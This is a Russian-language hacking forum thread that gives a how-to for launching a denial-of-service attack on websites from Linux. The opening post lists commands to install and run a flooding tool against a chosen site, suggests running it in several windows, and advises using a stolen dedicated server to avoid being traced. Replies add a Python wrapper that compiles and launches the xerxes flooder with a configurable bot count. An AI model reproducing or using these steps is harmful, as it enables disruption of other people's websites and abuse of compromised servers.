DDos-Attack: Помогаем сайту лечь через терминал

• Автор темы Автор темы FTC
  • Дата начала Дата начала
Статус
В этой теме нельзя размещать новые ответы.

FTC

Пассажир
Реакции
18
Шаломы пиплы и не...Вчера я опубликовал слабую DOS атаку(не путать с DDOS атакой)через какой-то термукс но сегодня через Linux. Это лучше делать с пизженного дедика или левого сервака, а то очень быстро придут бить лицо :)
Приступим чего же ждем:derisive::
Установка обновим пакеты:

sudo apt update && sudo apt upgrade

Дальше качаем гит и питон:

sudo apt install git python

Копируем нужный нам репозиторий:

git clone

Открываем папку с тулзой и делаем все файлы в ней исполняемыми:

cd DDos-Attack chmod +x *

Собственно запускаем тулзу:

python run.py

После этого нам нужно просто ввести название сайта:
IMG_20201124_235457_743.jpg

Данная утилита направляет 80 ботов/сек, поэтому для лучшего результата, запустите её хотя бы в 5 окнах. Но если полазить в коде можно изменить, но жаль что я этого не знаю как это делать:(
Да может и нужно встать с кровати и напечатать готовый текст, но это лучше чем платить за DDOS атаку с голой жопой:derisive:...
Спасибо за прочтение!

Последнее редактирование:
указал бы, что это лучше делать с пизженного дедика или левого сервака, а то очень быстро придут бить лицо :)

Код этот из питона идет в Си

import os
os.system("clear")
print(""" ddos""")
os.system("chmod +x xerxes.c")
os.system("gcc xerxes.c -o xerxes")
a = input("\n Enter website address eg : \n Website Name : ")
os.system("./xerxes "+a+" 80")
в конце можно поставить сколько хочешь ботов вместо 80
и не надо открывать доп окна

Ну, если на сайте будет мало-мальски нормальная защита это тебе не поможет, а если голой жопой наружу, то почему бы и не сэкономить

указал бы, что это лучше делать с пизженного дедика или левого сервака, а то очень быстро придут бить лицо :)
Лады сейчас изменю)
Сообщение обновлено:

Ахуеть ты ахуенныйramp
Код этот из питона идет в Си

import os
os.system("clear")
print(""" ddos""")
os.system("chmod +x xerxes.c")
os.system("gcc xerxes.c -o xerxes")
a = input("\n Enter website address eg : \n Website Name : ")
os.system("./xerxes "+a+" 80")
в конце можно поставить сколько хочешь ботов вместо 80
и не надо открывать доп окна
Сообщение обновлено:

Ну, если на сайте будет мало-мальски нормальная защита это тебе не поможет, а если голой жопой наружу, то почему бы и не сэкономить
Ну это да...соглашаюсь
Сообщение обновлено:

Исправил:)

Последнее редактирование:
Статус
В этой теме нельзя размещать новые ответы.